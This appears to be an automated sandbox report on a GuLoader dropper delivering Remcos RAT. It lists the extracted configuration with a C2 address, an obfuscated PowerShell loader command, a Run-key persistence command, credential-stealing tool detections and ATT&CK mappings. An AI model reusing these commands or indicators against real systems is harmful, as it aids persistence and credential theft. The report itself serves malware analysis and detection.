guloader | hxxps://bazaar[.]abuse[.]ch/sample/c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b/

Analysis

max time kernel
688s
max time network
687s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
25-09-2024 16:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://bazaar.abuse.ch/sample/c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b/

Score

10^/10

guloader remcos rem_doc2 collection discovery downloader execution persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

Rem_doc2

107.173.4.16:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-DSGECX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 6 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/4820-301-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2100-303-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2100-306-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/112-312-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/112-315-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/4820-319-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2100-303-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2100-306-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/4820-301-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/4820-319-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3140	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
3660	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
4820	Conspect124.exe
2100	Conspect124.exe
112	Conspect124.exe

Loads dropped DLL 1 IoCs

pid	Process
4692	Conspect124.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Conspect124.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\\Forseglingens\\').Drenching;%Begunstigelses% ($Hjtryksryg)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
4692	Conspect124.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3140	powershell.exe
4692	Conspect124.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3140 set thread context of 4692	3140	powershell.exe	98
PID 4692 set thread context of 4820	4692	Conspect124.exe	102
PID 4692 set thread context of 2100	4692	Conspect124.exe	103
PID 4692 set thread context of 112	4692	Conspect124.exe	104

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\omdigtendes.udd	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\knytt\Ballistics.mus	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
File opened for modification	C:\Windows\resources\villan\Knastakslerne.ini	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
File created	C:\Windows\brandbombernes.lnk	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conspect124.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conspect124.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conspect124.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conspect124.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133717544310971900"	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4960	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.zip:Zone.Identifier	chrome.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1404	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4168	chrome.exe
4168	chrome.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
4820	Conspect124.exe
4820	Conspect124.exe
112	Conspect124.exe
112	Conspect124.exe
4820	Conspect124.exe
4820	Conspect124.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
3140	powershell.exe
4692	Conspect124.exe
4692	Conspect124.exe
4692	Conspect124.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeShutdownPrivilege	4168	chrome.exe
Token: SeCreatePagefilePrivilege	4168	chrome.exe
Token: SeRestorePrivilege	4532	7zG.exe
Token: 35	4532	7zG.exe
Token: SeSecurityPrivilege	4532	7zG.exe
Token: SeSecurityPrivilege	4532	7zG.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	112	Conspect124.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4532	7zG.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE
1404	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4168 wrote to memory of 2864	4168	chrome.exe	78
PID 4168 wrote to memory of 2864	4168	chrome.exe	78
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 3764	4168	chrome.exe	79
PID 4168 wrote to memory of 4956	4168	chrome.exe	80
PID 4168 wrote to memory of 4956	4168	chrome.exe	80
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81
PID 4168 wrote to memory of 2892	4168	chrome.exe	81

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://bazaar.abuse.ch/sample/c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b/
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe9b9acc40,0x7ffe9b9acc4c,0x7ffe9b9acc58
  2⤵
  PID:2864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:3764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1384,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1624 /prefetch:3
  2⤵
  PID:4956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2416 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3104 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3092,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4436 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4264,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4760 /prefetch:8
  2⤵
  PID:1168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4384,i,2395566948580541116,3981148333258546402,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3092

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4876

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1572

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap25206:190:7zEvent4733
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4532

C:\Users\Admin\Downloads\c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe
"C:\Users\Admin\Downloads\c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3660
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID:3140
- - C:\Users\Admin\AppData\Local\Temp\Conspect124.exe
    "C:\Users\Admin\AppData\Local\Temp\Conspect124.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4692
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
      4⤵
      System Location Discovery: System Language Discovery
      PID:488
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:4960
  - - C:\Users\Admin\AppData\Local\Temp\Conspect124.exe
      C:\Users\Admin\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\Admin\AppData\Local\Temp\momlwmheabsosjwr"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\Conspect124.exe
      C:\Users\Admin\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\Admin\AppData\Local\Temp\xqrwxesyojkbuxtvkjb"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook accounts
      System Location Discovery: System Language Discovery
      PID:2100
  - - C:\Users\Admin\AppData\Local\Temp\Conspect124.exe
      C:\Users\Admin\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\Admin\AppData\Local\Temp\hkfoyxdakrdgeehzttobyiz"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:112

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\SuspendEnter.ods"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
e7068f3fceee2f64e4bc8db4892531b3

SHA1
c8e156cabc07173deee53a2ca99a0f0c9f0b505d

SHA256
df6686e4f30f39db8d609b366fb91f36a594f763bbc6521d812ee5c4651da06b

SHA512
cac3f8cdc443c30c313a2e319f5e29ce4ecb0c2f0255a5a43b63f1819aad9db3ef8a01c6de3bfb1ca8ef18886f08c21aaf0be06e4c9d8d62f6c326ad8884577e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

Filesize
213KB

MD5
f942900ff0a10f251d338c612c456948

SHA1
4a283d3c8f3dc491e43c430d97c3489ee7a3d320

SHA256
38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6

SHA512
9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
2ed1034bf40413fe3f94bd47e2c6229c

SHA1
dc1d8ef3bf00652cca1ecf1ad9269c71ed4fc294

SHA256
a8c0a1ab316d56849bbcf4fad099a9df528e2846a07fe51b8ec7349b946f1f34

SHA512
95dea6645d66865bf8d3bf84e6f5cc56a233d5a2f3f84eae893f08ba4d284ccc6c2487eafd7ec062d03f8c882fa2aa3870fdf313d31faa6170bd165de9a0fc13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
2abb97b0b27156e9298242e2a9e296c7

SHA1
c1e80a6c0b6971117909c7c4b75a6cd43d955d3b

SHA256
057445601aeb162c792a14ec2c409010009970029a28e5eb48780629a693ac0e

SHA512
e078961883d9f91c7c0e8bc71839a62e7dc7c4f78aaa93c99a491d399cf37becad654bcf06e72cdfdcb8c364ce9f4de959e659251f7a9fa58958264485d559f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
688B

MD5
